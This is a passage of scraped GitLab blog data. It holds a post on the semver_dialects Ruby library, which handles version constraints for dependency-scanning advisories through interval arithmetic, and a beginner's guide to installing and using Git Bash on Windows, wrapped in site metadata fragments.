approach.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663397/Blog/Hero%20Images/logoforblogpost.jpg","https://about.gitlab.com/blog/generic-semantic-version-processing","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"SemVer versioning: how we handled it with linear interval arithmetic\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Julian Thome\"}],\n        \"datePublished\": \"2021-09-28\",\n      }",{"title":2026,"description":2027,"authors":2032,"heroImage":2028,"date":2033,"body":2034,"category":865,"tags":2035},[775],"2021-09-28","\nThe [semantic versioning (SemVer) specification](https://semver.org/) can be\nconsidered the de-facto standard for tracking software states during its\nevolution. 
Unfortunately, in reality many languages/ecosystems practice \"SemVer versioning\" and have not adopted\nthe standard as-is; instead we can find many different semantic versioning\nflavors that are not necessarily compatible with the original SemVer spec. SemVer Versioning has\nled to the creation of a variety of different semantic versioning schemes.\n\nGitLab provides a [Dependency Scanning (DS)](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/)\nfeature that automatically detects vulnerabilities in the dependencies of a\nsoftware project for a variety of different languages. DS relies on the\n[GitLab Advisory Database](https://gitlab.com/gitlab-org/security-products/gemnasium-db)\nthat is updated on a daily basis providing information about\nvulnerable packages that is expressed in the package-specific (native)\nsemantic version dialect. GitLab also recently launched an [Open Source Edition](https://gitlab.com/gitlab-org/advisories-community) of the GitLab Advisory Database.\n\nAt GitLab we use a semi-automated process for advisory generation: we extract\nadvisory data that includes package names and vulnerable versions from\ndata-sources such as [NVD](https://nvd.nist.gov/) and generate advisories that\nadhere to the GitLab advisory format before they are curated and stored in our\n[GitLab Advisory Database](https://gitlab.com/gitlab-org/security-products/gemnasium-db).\n\nThe plethora of SemVer versioning in the wild posed a major\nchallenge for the level of automation we could apply in the advisory generation\nprocess: the different semantic version dialects prevented us from building\ngeneric mechanisms around version matching, version verification (i.e., the\nprocess of verifying whether or not versions are available on the relevant package\nregistry), fixed version inference etc. 
Moreover, since advisory generation\nrequires us to extract and update advisory data on scale from data-sources with\nhundreds of thousands vulnerability entries, translating and/or verifying\nversions by hand is not a viable, scalable solution.\n\nHaving a generic method to digest and process a variety of different SemVer versioning dialects was an important building block for automating large parts of the advisory generation process. This led to the development of\n[semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects), a\nutility that helps processing semantic versions in a generic, language-agnostic manner which\nhas been recently open-sourced (MIT) and [published on rubygems.org](https://rubygems.org/gems/semver_dialects).\n\n## Understand the SemVer spec\n\nThe SemVer spec is the de-facto standard for tracking states of software projects during their evolution\nby associating unique, comparable version numbers to distinct states, and by\nencoding semantic properties into the semantic version strings so that a version\nchange implicitly conveys information about the nature of the change.  \n\nA semantic version consists of a prefix (version core) and a suffix that hold\npre-release and/or build information. A version core consists of three numeric\ncomponents that are delimited by `.`:\n\n* major: backwards-incompatible changes\n* minor: new backwards-compatible functionality\n* patch: backwards-compatible bug fixes\n\nConsidering a software project using SemVer, with two releases `1.0.0` and\n`1.0.1`, by just looking at the change applied to the semantic version strings,\nit is clear that `1.0.1` is a newer (more recent) release of the software, whereas version\n`1.0.0` is an older release. In addition, the version number `1.0.1`\nrepresents an improved state of the software as compared to version `1.0.0` which contained a bug\nthat has been fixed in version `1.0.1`. 
This fix is signalled by the higher number of the patch version component.\n\nSemantic version processing is particularly useful in the context of [Dependency Scanning (DS)](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/). DS is the process of automatically detecting (and potentially fixing)\nvulnerabilities related to the dependencies of a software project: dependencies\nof a software project are checked against a set of configuration files (so\ncalled advisories) that contain information about vulnerable dependencies;\nadvisories usually include the versions of the vulnerable dependency.\nVulnerable versions are usually expressed in terms of version intervals: for example [this out-of-bounds read vulnerability for the Python tensorflow package](https://nvd.nist.gov/vuln/detail/CVE-2021-29560) contains information about the vulnerable version by listing the four version intervals below:\n\n1. up to 2.1.4\n1. from 2.2.0 up to 2.2.3\n1. from 2.3.0 up to 2.3.3\n1. from 2.4.0 up to 2.4.2\n\nWhile SemVer is very concise and clear about the syntax and semantic of\nsemantic versions, it does not specify how to express and represent semantic\nversion constraints. In addition, SemVer is purposefully simplistic to foster\nits adoption. In practice it seems as if many ecosystems required features that\ngo beyond SemVer which led to the development of many SemVer versioning flavours as well\nas a variety of different native constraint matching syntaxes, some of which\ndeviate from the official SemVer specification.  Depending on the ecosystem you\nare working with, the same semantic version string may be treated/interpreted\ndifferently: for example both Maven and pip/PyPI treat versions `1.2.3.SP`\ndifferently because pip/PyPI lacks the notion of an `SP` post release. 
Apart\nfrom that, `1.2.3.SP` cannot be considered a valid semantic version according\nto the SemVer spec.\n\nToday we have a variety of different semantic versioning schemes:\n\n- `gem`: [gem requirement](https://guides.rubygems.org/specification-reference/#add_runtime_dependency)\n- `maven`: [Maven Dependency Version Requirement Specification](https://maven.apache.org/pom.html#Dependency_Version_Requirement_Specification)\n- `npm`: [node-semver](https://github.com/npm/node-semver#ranges)\n- `php`: [PHP Composer version constraints](https://getcomposer.org/doc/articles/versions.md#writing-version-constraints)\n- `pypi`: [PEP440](https://www.python.org/dev/peps/pep-0440/#version-specifiers)\n- `go`: [go semver](https://godoc.org/golang.org/x/tools/internal/semver)\n- `nuget`: [NuGet semver](https://docs.microsoft.com/en-us/nuget/concepts/package-versioning)\n- `conan`: [node-semver flavour](https://github.com/npm/node-semver#ranges)\n\nThis SemVer versioning fragmentation limited the degree of automation we could apply to our\nadvisory extraction/generation process. 
This limitation motivated the\ndevelopment of a methodology and tool [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) that helps to digest and process semantic versions in a language agnostic way and, hence, helps to reduce the manual advisory curation effort.\n\nBelow, you can see an excerpt of the advisory information that is extracted and\ngenerated by our semi-automated advisory generation process:\n\n```yaml\n# ...\naffected_range: \">=1.9,\u003C=2.7.1||==2.8\"\nfixed_versions:\n- \"2.7.2\"\n- \"2.8.1\"\nnot_impacted: \"All versions before 1.9, all versions after 2.7.1 before 2.8, all versions\n  after 2.8\"\nsolution: \"Upgrade to versions 2.7.2, 2.8.1 or above.\"\n# ...\n```\n\nIn the excerpt above:\n\n- `affected_range` denotes the range of affected versions which is the machine-readable, native syntax used by the package manager/registry (in this case pypi).\n- `fixed_versions` denotes the concrete versions when the vulnerability has been fixed.\n- `not_impacted` provides a textual description of the versions that are not affected.\n- `solution` provides information about how to remediate the vulnerability.\n\nTo be able to extract and generate advisories like the one illustrated\nabove in a language/ecosystem agnostic way, we implemented and open-sourced a\ngeneric semantic version representation and processing approach called\nsemver_dialects.\n\nIn the advisory excerpt above, the `affected_range` field contains the version\nconstraints in the native constraint syntax (in this case PyPI for Python);\n`fixed_versions` can be inferred by inverting the `affected_version` (i.e.,\nnon-affected versions) and by selecting the first available  version that falls\ninto the range of non-affected versions from the native package registry; this step\nrequires our approach to be able to parse the native semantic version syntax.\n\nIn order to deal with SemVer versioning and automatically process and generate the fields 
according to this\ndescription, our [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) implementation had to satisfy the following requirements:\n\n1. Provide a unified interface to the language specific dialects.\n1. Match semantic versions in a language agnostic way.\n1. Invert ranges.\n1. Cope with scattered, non-consecutive ranges.\n1. Parse and produce different version syntaxes.\n1. Parse and match versions/constraints in a best-effort manner.\n\n## SemVer versioning representation\n\nFirst, we need a generic representation of a semantic version to start with. We\nassume that a semantic version is composed of prefix and suffix where the\nprefix contains segments for major, minor and patch version components as defined in the\nSemVer specification. The suffix may hold additional information about pre/post\nreleases etc. As illustrated below, the major, minor and patch prefix segments\ncan be accessed by means of the corresponding methods.\n\n``` ruby\ns1 = SemanticVersion.new('1.2.3')\nputs \"segments: #{s1}\"\n# segments: 1:2:3\nputs \"major #{s1.major}\"\n# major 1\nputs \"minor #{s1.minor}\"\n# minor 2\nputs \"patch #{s1.patch}\"\n# patch 3\n```\n\nWe cannot generally assume that all provided versions we would like to process\nfully adhere to the SemVer spec which requires a version prefix (core) to\nconsist of three segments: major, minor and patch. Hence, per default, we\nremove redundant, trailing zeros from the prefix to ensure that\n`2.0.0`, `2.0` and `2` are considered identical.\n\n[Semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) translates language specific version suffixes into numeric values. This process\ncan be described as version normalization.  
For example the Maven (pre-)release\ncandidate version `2.0.0.RC1` can be translated to a numeric representation\nwith prefix: `2` and suffix `-1:1` by mapping `RC` to a numeric value (in this\nexample `-1`) and, thus, rendering it numerically comparable.\n\nAfter this normalization step, semantic version matching for two versions `vA`\nand `vB` can be implemented by simply numerically comparing their segments in a\npairwise fashion.  For unknown suffices that are not mappable to the numeric\ndomain, we use lexical matching as a default fallback strategy.\n\nIn summary, comparing two semantic versions is a two-step process:\n\n1. Normalization: Extend both semantic versions to have the same prefix length and suffix\n   lengths by appending zeros.\n1. Comparison: Iterate over segments and compare each of them numerically.\n\nFor example, after normalizing the versions `2.0.0.RC1` and `2.0.0` to `2:-1:1`\nand `2:0:0`, respectively, we can iterate over the segments (delimited by\n`:` in the example) which we can compare numerically to successfully identify\n`2:-1:1` as being the smaller (release-candidate) version in comparison to\n`2:0:0`.\n\n## Constraint syntax - everything is a linear interval\n\nTranslating semantic versions into a generic representation makes them\nnumerically comparable which is already useful but not sufficient to express SemVer versioning constraints in a language-agnostic fashion.\n\nFor representing semantic version constraints in a generic way,\nwe rely on linear intervals.  For the purpose of this blog, we define an interval as an ordered pair of two\nsemantic versions which we are referring to as lower and upper\nbounds (or cuts). For the sake of simplicity, for the remainder of\nthis section we will use simple integers as examples for lower and upper bounds, respectively.\n\nLinear intervals capture semantic version ranges symbolically which makes them\nvery versatile and space efficient. 
At the same time, we can rely on\nwell-established mathematical models borrowed from linear interval arithmetic\nthat enable us to translate/express any type of constraint in terms of\nmathematical set operations on intervals.\n\nIn the table below you can find all the different types of intervals we\nconsidered to model semantic version constraints and a corresponding\ndescription where `L` stands for left, `R` stands for right with `a` and `b`\nbeing the lower and upper bounds, respectively.\n\n| Type of interval | Example                    | Description                               |\n| ---------------- | ---------------------------| ----------------------------------------- |\n| LR-closed        |  `[a,b]: x >= a, x \u003C= b`   | all versions starting from a until b      |\n| L-open R-closed  |  `(a,b]: x > a, x \u003C= b`    | all versions after a until b              |\n| L-closed R-open  |  `[a,b): x >= a, x \u003C b`    | all versions starting from a before b     |\n| LR-open          |  `(a,b): x > a, x \u003C b`     | all versions between a and b              |\n| L-unbounded      |  `(-inf,b]: x \u003C= b`        | all versions until b                      |\n| R-unbounded      |  `[a,+inf): x >= a`        | all versions starting from a              |\n\nBelow you can see example output for the different types of ranges from\n[semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) where we are using the `VersionParser` component to generate\nlinear intervals from version constraints where `,` denotes a logical\nconjunction: e.g., `>=1, \u003C=2` denotes the set of integers that are greater than or equal\nto 1 *and* smaller than or equal to two, i.e., all integers/versions numbers starting from 1 until 2.\n\n``` ruby\nputs VersionParser.parse(\">=1, \u003C=2\")\n# [1,2]\nputs VersionParser.parse(\">1, \u003C=2\")\n# (1,2]\nputs VersionParser.parse(\">=1, \u003C2\")\n# [1,2)\nputs VersionParser.parse(\">1, 
\u003C2\")\n# (1,2)\nputs VersionParser.parse(\"\u003C=2\")\n# (-inf,2]\nputs VersionParser.parse(\">=1\")\n# [1,+inf)\n```\n\nFor solving SemVer versioning constraints, we use linear interval arithmetic\nwhich is explained in-depth in the text-book \"[Introduction to Interval\nAnalysis](https://epubs.siam.org/doi/book/10.1137/1.9780898717716?mobileUi=0&).\"\n\nAs mentioned earlier, for our purposes, we define an interval as an ordered\npair of two semantic versions (lower and upper bound) that represents the set\nof all those semantic versions that are enclosed by lower and upper bounds.\nGiven that intervals are sets, we can perform standard set operations on\nthem.\n\nIn the context of advisory generation, there are three operations we require to\nsatisfy all the requirements we defined earlier: Intersection, Union and Complement.\nThe operations are explained in more detail in the sections below.\n\nFor the remainder of this section, we explain interval operations, using two\nexample intervals `X` and `Y` with `X=[x_l, x_u]` and `Y=[y_l, y_u]` where\n`x_l`, `x_u` denote the lower and upper bounds for `X`, and `y_l`, `y_u` denote\nthe lower and upper bounds for `Y`, respectively. In addition, we are using the\n`min` and `max` functions, where `max(a,b)` returns the largest and `min(a,b)`\nreturns the smallest value of the parameters `a` and `b`; the ∅ symbol denotes\nthe empty set.\n\n### Intersection\n\nThe recipe below illustrates how the intersection (`X` ∩ `Y`) can be computed.\n\n`X` ∩ `Y` = if `X` and `Y` have points in common `[max(x_l,y_l), min(x_u,y_u)]` else ∅\n\nIntuitively, the intersection extracts the overlap (if any) from the two\nintervals `X` and `Y`.\n\nThe code snippet below shows how the intersection is computed in [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) for the two examples:\n\n1. `[2,5]` ∩ `[3,10]`\n1. `[2,5]` ∩ `[7,10]`\n\n``` ruby\n# 1. 
[2,5] ∩ [3,10] = [3, 5]\nputs VersionParser.parse(\">=2, \u003C=5\").intersect(VersionParser.parse(\">=3, \u003C=10\"))\n# [3,5]\n\n# 2. [2,5] ∩ [7,10] = ∅\nputs VersionParser.parse(\">=2, \u003C=5\").intersect(VersionParser.parse(\">=7, \u003C=10\"))\n# empty\n```\n\nThe intersection operation is useful to perform semantic version matching\nfor checking whether semantic version falls into a certain version interval\nor range. For instance we may want to check whether version `1.2.3` satisfies\nthe constraint `>=1.0.0, \u003C1.2.4`. In the context of [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), these types of\nconstraints are very common. The problem `1.2.3` ∈ `[1.0.0, 1.2.4)` can be\ntranslated to a set intersection: `[1.2.3, 1.2.3]` ∩ `[1.0.0, 1.2.4)` =\n`[1.2.3, 1.2.3]`  which returns a non-empty set and, hence, tells us that\nversion `1.2.3` satisfies the given version constraints.\n\nIn the context of our advisory generation process, we use intersection to\ncross-validate versions from vulnerability reports (CVEs) with versions of the\navailable package that are available on the package registry that serves it.\n\nFor convenience, as mentioned earlier, [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) also supports grouping\nintervals into ranges by means of the `VersionRange` class. A range is a set of intervals\nwhich we denote with `{I0, I1, ..., IN}` where `I` denotes version intervals\ndelimited by `,` which can be interpreted as a union operator (explained in the next section).\n\nA range is a set of intervals. In the example below, we first create a range\n`r1` to which we are adding two intervals: `r1 = {[2.2.1, 5.1.2], (3.1, 10)}`.\nAfter that, there is a check for an overlap (i.e., an intersection) between\n`r1` and `[0, 2.1)` (no overlap) as well as `[5.5, 5.5]` (overlap). 
You can see\nthe output of [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) in the excerpt below.\n\n``` ruby\nr1 = VersionRange.new\nr1.add(VersionParser.parse(\">=2.1.2, \u003C=5.1.2\"))\nr1.add(VersionParser.parse(\">3.1, \u003C10\"))\n\nputs \"[0,2.1) in #{r1}? #{r1.overlaps_with?(VersionParser.parse(\">=0, \u003C2.1\"))}\"\n# [0,2.1) in [2.1.2,5.1.2],(3.1,10)? false\nputs \"[5.5,5.5] overlap with #{r1}? #{r1.overlaps_with?(VersionParser.parse(\"=5.5\"))}\"\n# [5.5,5.5] overlap with [2.1.2,5.1.2],(3.1,10)? true\n```\n\n### Union\n\nThe recipe below illustrates how the union (`X` ∪ `Y`) can be computed.\n\n`X` ∪ `Y` = if `X` and `Y` have points in common `{[min(x_l,y_l), max(x_u,y_u)]}` else `{X,Y}`\n\nThe code snippet below shows how the union can be computed with\n [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) for the two examples:\n1. `[2,5]` ∪ `[3,10]` = `{[2,5], [3,10]}` = `{[2, 10]}`\n2. `[2,5]` ∪ `[7,10]` = `{[2,5], [7,10]}`\n\nWith the union operator, we can collapse version intervals in case they have an\noverlap/intersection; otherwise, if `X` and `Y` are disjoint, we add their\nintervals directly to the range.\n\n``` ruby\n# 1. [2,5] ∪ [3,10] = [2, 10]\nputs \"union: #{VersionParser.parse(\">=2, \u003C=5\").union(VersionParser.parse(\">=3, \u003C=10\"))}\"\n# union: [2,10]\n\n# Version ranges perform union two for the purpose of automatically collapsing\n# intervals (if possible)\nr1 = VersionRange.new\nr1.add(VersionParser.parse(\">=2, \u003C=5\"))\nr1.add(VersionParser.parse(\">=3, \u003C=10\"))\nputs \"r1: #{r1}\"\n# union: [2,5],[3,10]\nputs \"r1 collapsed: #{r1.collapse}\" # creates the union between intervals\n# r1 collapsed: [2,10]\n\n# 2. 
[2,5] ∪ [7,10] = {[2, 10], [7,10]}\nr2 = VersionRange.new\nr2.add(VersionParser.parse(\">=2, \u003C=5\"))\nr2.add(VersionParser.parse(\">=7, \u003C=10\"))\nputs \"r2: #{r2}\"\n# r2: [2,5],[7,10]\n```\n\nIn the context of [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), vulnerability data usually lists a set of intervals for\ndependencies that are susceptible to a given vulnerability like the [tensorflow example](https://nvd.nist.gov/vuln/detail/CVE-2021-29560) in the introduction where the following versions are affected:\n\n1. up to 2.1.4\n1. from 2.2.0 up to 2.2.3\n1. from 2.3.0 up to 2.3.3\n1. from 2.4.0 up to 2.4.2\n\nThis list of intervals can be represented as a single range (`VersionRange`) by\ncombining all of the mentioned version intervals through the union operator.\n\nIn the Ruby code example above, you can also see the `collapse` method which is\ninvoked on a `VersionRange` object. This method automatically collapses\noverlapping intervals that are included in the same `VersionRange` to eliminate\nredundant intervals. Collapsing the range `{[2, 5], [3, 10]}` yields a new range\n`{[2,10]}` with only one interval while preserving semantic equivalence.\n\n### Complement\n\nThe recipe below, illustrates how the relative complement (`X` - `Y`) can be computed.\n\n`X` - `Y`: `Z` := `X` ∩ `Y`;\n        if (`z_l` > `x_l` && `z_u` \u003C `x_u`)\n          `{[x_l, z_l),(z_u, x_u]}`\n        else if (`x_l` \u003C `z_l`)\n          `{[x_l, z_l)}`\n        else if (`x_u` > `z_u`)\n          `{(z_u, x_u]}`\n\nIntuitively, this recipe computes the intersection (`Z`) between `X` and `Y` and\nremoves all elements from `X` that are included in the intersection. The\nexamples below illustrate the recipe:\n\n1. `[3, 5]` - `[1, 3]`: with `Z` = `[3, 3]` we get `{(3, 5]}` which is\n   equivalent to `{[4, 5]}`\n1. `[3, 10]` - `[10, 11]`: with `Z` = `[10, 10]` we get `{[3, 10)}` which is equivalent to `{[3, 9]}`\n1. 
`[1, 5]` - `[2, 2]`: with `Z` = `[2, 2]` we get `[1, 2), (2, 5]` which is equivalent to `{[1, 1], [3, 5]}`\n\nWith the recipe above, we can also compute the absolute complement `X` - `Y` by\nassuming `X` is the universe that captures the entirety of all possible values:\n`(-inf,+inf)`. The universal complement can be defined as `~X` = `(-inf,+inf)` - `X`.\n\nWith [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects), the absolute complement can be computed by means of the\n`invert` method as illustrated in the example below.\n\n``` ruby\n# example 1: ~[1,3] = {(-inf,0],[4, +inf)} = {(-inf,1),(3,+inf)}\nr1 = VersionRange.new\nr1.add(VersionParser.parse(\">=1, \u003C=3\"))\nputs r1.invert\n# (-inf,1),(3,+inf)\n\n# example 2: ~{[2.1.2, 5.1.2], (3.1, 10)} = ~{[2.1.2, 10)} = {(-inf,2.1.2),[10,+inf)}\n{(-inf,0],[4, +inf)} = {(-inf,1),(3,+inf)}\nr2 = VersionRange.new\nr2.add(VersionParser.parse(\">=2.1.2, \u003C=5.1.2\"))\nr2.add(VersionParser.parse(\">3.1, \u003C10\"))\nputs r2.collapse.invert\n# (-inf,2.1.2),[10,+inf)\n```\n\nIn the context of [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), this functionality is used to automatically infer\nnon-affected versions from the affected versions information: if `[1, 3]`\nrepresents all the affected versions of a vulnerable package, its complement\n`{(-inf,1),(3,+inf)}`, per definition, captures only the unaffected version. 
In\nour advisory generation process we cross-validate the version information of\npackages from the package registries with this information about unaffected versions to check whether or not unaffected packages are available; if this is the case, we add the corresponding remediation information to the generated advisories.\n\n## Version Translation\n\nLinear interval arithmetic provides us with all the means necessary to\nrepresent and solve SemVer versioning constraints in a language-agnostic way.\nHowever, in order to leverage the generic representation, we have to be able to\nautomatically translate the native semantic version dialects into the generic\nrepresentation and vice versa. The details of this translation functionality\nare provided below.\n\n[Semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) offers a `VersionTranslator` class. The `VersionTranslator` takes a native semantic version constraint, and translates\nit into an intermediate string representation that can then be translated into a range (`VersionRange`) by using the `VersionParser`. 
Currently semver_dialects supports all the syntax listed below by invoking\n`translate_\u003Cpackage_type>` where `\u003Cpackage_type>` is one of:\n\n- `gem`: [gem requirement](https://guides.rubygems.org/specification-reference/#add_runtime_dependency)\n- `maven`: [Maven Dependency Version Requirement Specification](https://maven.apache.org/pom.html#Dependency_Version_Requirement_Specification)\n- `npm`: [node-semver](https://github.com/npm/node-semver#ranges)\n- `packagist`: [PHP Composer version constraints](https://getcomposer.org/doc/articles/versions.md#writing-version-constraints)\n- `pypi`: [PEP440](https://www.python.org/dev/peps/pep-0440/#version-specifiers)\n- `go`: [go semver](https://godoc.org/golang.org/x/tools/internal/semver)\n- `nuget`: [NuGet semver](https://docs.microsoft.com/en-us/nuget/concepts/package-versioning)\n- `conan`: [node-semver flavour](https://github.com/npm/node-semver#ranges)\n\nThe example below illustrates how the [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects)' `VersionTranslator` can\nbe used to translate native version syntax to an intermediate representation.\nThe `VersionTranslator` parses the native version syntax and translates it into\na common format. In the example below, you can further see that both\nnative, semantically equivalent but syntactically different version strings for\npackagist and maven are translated into a common format: a string array\nwhere a single array entry represents a conjunct of the semantic version\nconstraints. 
This translation step removes all language-specific features\nfrom the native semantic version constraints.\n\n``` ruby\n# native packagist version constraint syntax\nvs_packagist = \"\u003C2.5.9||>=2.6.0,\u003C2.6.11\"\n# native maven version constraint syntax\nvs_maven = \"(,2.5.9),[2.6.0,2.6.11)\"\n\n# translate\nputs VersionTranslator.translate_packagist(vs_packagist).to_s\n# [\"\u003C2.5.9\", \">=2.6.0 \u003C2.6.11\"]\nputs VersionTranslator.translate_maven(vs_maven).to_s\n# [\"\u003C2.5.9\", \">=2.6.0 \u003C2.6.11\"]\n```\n\nThis common format can then be translated to a version interval by means of\n`VersionParser` and `VersionRange`. The example below illustrates how the\nversion interval `constraint` is generated by iterating over the array elements\nof our intermediate representation, translating them to intervals and adding\nthese intervals to the `VersionRange` object `constraint`. At the end of the\nexcerpt below, we check whether version `1.0.0` satisfies the version\nconstraint `\u003C2.5.9||>=2.6.0,\u003C2.6.11` which correctly yields `true`.\n\n``` ruby\n# translate native maven version constraint to range of interval\nconstraint = VersionRange.new\nVersionTranslator.translate_maven(vs_maven).each do |version_string|\n  constraint \u003C\u003C VersionParser.parse(version_string)\nend\n\nputs constraint.overlaps_with?(VersionParser.parse('=' + '1.0.0'))\n# true\n```\n\n## Wrapping it up\n\nWe discussed the fragmentation of SemVer versioning which poses a challenge\nwhen building automation around semantic version processing for\nmulti-language/ecosystem applications. In this blog post, we used our internal\nsemi-automated process for advisory generation as an example.\n\nWe illustrated how we tackled the above-mentioned challenge by building a\ngeneric/language-agnostic semantic version approach based on linear interval\narithmetic. 
All mechanisms discussed in this blog post are implemented in the open-sourced (MIT)\n[semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) implementation and published on [rubygems.org](https://rubygems.org/gems/semver_dialects).\n",[865,685,9],{"slug":2037,"featured":6,"template":689},"generic-semantic-version-processing","content:en-us:blog:generic-semantic-version-processing.yml","Generic Semantic Version Processing","en-us/blog/generic-semantic-version-processing.yml","en-us/blog/generic-semantic-version-processing",{"_path":2043,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2044,"content":2050,"config":2055,"_id":2057,"_type":14,"title":2058,"_source":16,"_file":2059,"_stem":2060,"_extension":19},"/en-us/blog/git-command-line-on-windows-with-git-bash",{"title":2045,"description":2046,"ogTitle":2045,"ogDescription":2046,"noIndex":6,"ogImage":2047,"ogUrl":2048,"ogSiteName":673,"ogType":674,"canonicalUrls":2048,"schema":2049},"Git command line on Windows with Git Bash","Learn about Git Bash, how it works, how to install it, and the main commands you need to know.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749660028/Blog/Hero%20Images/blog-image-template-1800x945__25_.png","https://about.gitlab.com/blog/git-command-line-on-windows-with-git-bash","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git command line on Windows with Git Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2024-12-16\",\n      }",{"title":2045,"description":2046,"authors":2051,"heroImage":2047,"date":2052,"body":2053,"category":10,"tags":2054},[970],"2024-12-16","Git commands allow developers to manage different versions of code and collaborate as a team. 
If you're in a Windows environment, you may have heard of Git Bash, a Bash terminal emulator that includes a Windows-friendly version of Git. Discover everything you need to know about installing Git Bash in this guide.\n\n## How does Git Bash work?   \nGit Bash is an application that you can install on Windows operating systems using Git for Windows. This application acts as an emulator to use the [Git version control tool](https://about.gitlab.com/topics/version-control/what-is-git-version-control/#what-is-git) on a Bash command terminal.\n\nBash is an acronym for Bourne Again SHell. SHell refers to the command terminal application of an operating system (OS). Bourne Again SHell is actually an upgraded version of Bourne SHell (also referred to as shell sh), the command line interface for UNIX developed by Stephen Bourne in 1977.  \n\nBash is the default shell for Linux and MacOS operating systems. With Git Bash, Windows users can install Bash, run Bash commands and use Git commands.\n\n## How to install Git Bash   \n\nTo download Git Bash, it is necessary to install Git for Windows. To do this, go to the official [Git for Windows](https://gitforwindows.org/) website and click \"Download\" to install the full Git package. When the download is complete, open the .exe file and begin the installation.  \n\nTo install Git Bash on Windows, please follow these step-by-step instructions:\n\n1. Open the .exe file and click **Next**. Select the appropriate folder for the installation.  \n2. Accept the terms of use and click **Next** to start the installation.  \n3. In this step, select the components to install. The pre-selected settings are relevant, but you can change them according to your preferences. Click **Next** again.  \n4. Then, choose the editor you prefer to use with Git. The tool recognizes editors already installed on your computer.  \n5. A window is displayed with three settings of the PATH environment. 
Depending on your needs, choose whether Git should only be used by Git Bash or if you want to use it from other third-party software.  \n6. Finally, keep the default settings by clicking **Next** and install Git Bash by clicking **Install**.\n\n## What are Bash commands?   \nFirst of all, the `pwd` (Print Working Directory) command allows you to view the absolute path. This means that it displays the path of the folder we are in at the time of typing the command.  \n**Remember:** When you open the Git Bash terminal, you are in a folder on your computer. Usually, this is the folder with your username.  \n\nThe `ls` command gives access to the list of files present in the current folder. You can also add options to the `ls` command with a dash `-`. For example, the `-l` option after `ls` lists the contents of a folder with more information about each file.\n\nBash also has a `cd` (Change Directory) command to move around your computer. To indicate the directory you want to go to, please specify the relative or absolute path after `cd`. The relative path is the location relative to the current directory while the absolute path is its location relative to the root folder.\n\n## How to use Git Bash with GitLab   \nUsing Git Bash with [GitLab](https://about.gitlab.com/) is like using the terminal emulator with another source code management platform. In order to push and retrieve your changes from GitLab, add the URL of your GitLab remote repository with the command: `git remote add origin \u003Crepository_url>`.\n\nIf your project is private, Git Bash asks you to authenticate yourself. Enter your credentials when the terminal requests your username and password. If you're having trouble logging in, check your authorization settings directly in GitLab.\n\nThen use the basic Git commands like `git clone`, `git commit`, `git push`, `git branch`, as well as `git checkout`, to name a few. 
To learn more, visit our [Git Cheat Sheet](https://about.gitlab.com/images/press/git-cheat-sheet.pdf).\n\n## Git Bash FAQ   \n**Are Git Bash and GitLab compatible?**\n\nYes. Using Git Bash with GitLab is similar to working with another source code management platform. Be sure to set up GitLab as a remote repository and authenticate yourself during the initial setup.\n\n**Why use Git Bash?**\n\nGit Bash acts as a terminal emulator to use the Git and Bash commands in a Windows environment.  \n\n**What's the point of a shell?**\n\nUsing a shell allows you to automate tasks through scripts, effectively control your computer and benefit from direct access to system functions.\n\n## Read more\n- [What is Git version control?](https://about.gitlab.com/topics/version-control/what-is-git-version-control/)\n- [What's new in Git 2.47.0?](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/)\n- [Git pull vs. git fetch: What's the difference?](https://about.gitlab.com/blog/git-pull-vs-git-fetch-whats-the-difference/)",[751,9],{"slug":2056,"featured":6,"template":689},"git-command-line-on-windows-with-git-bash","content:en-us:blog:git-command-line-on-windows-with-git-bash.yml","Git Command Line On Windows With Git Bash","en-us/blog/git-command-line-on-windows-with-git-bash.yml","en-us/blog/git-command-line-on-windows-with-git-bash",{"_path":2062,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2063,"content":2069,"config":2076,"_id":2078,"_type":14,"title":2079,"_source":16,"_file":2080,"_stem":2081,"_extension":19},"/en-us/blog/git-for-business-processes",{"title":2064,"description":2065,"ogTitle":2064,"ogDescription":2065,"noIndex":6,"ogImage":2066,"ogUrl":2067,"ogSiteName":673,"ogType":674,"canonicalUrls":2067,"schema":2068},"How we use Git as the blockchain for process changes","Git can be useful for more than just coding and operations. 
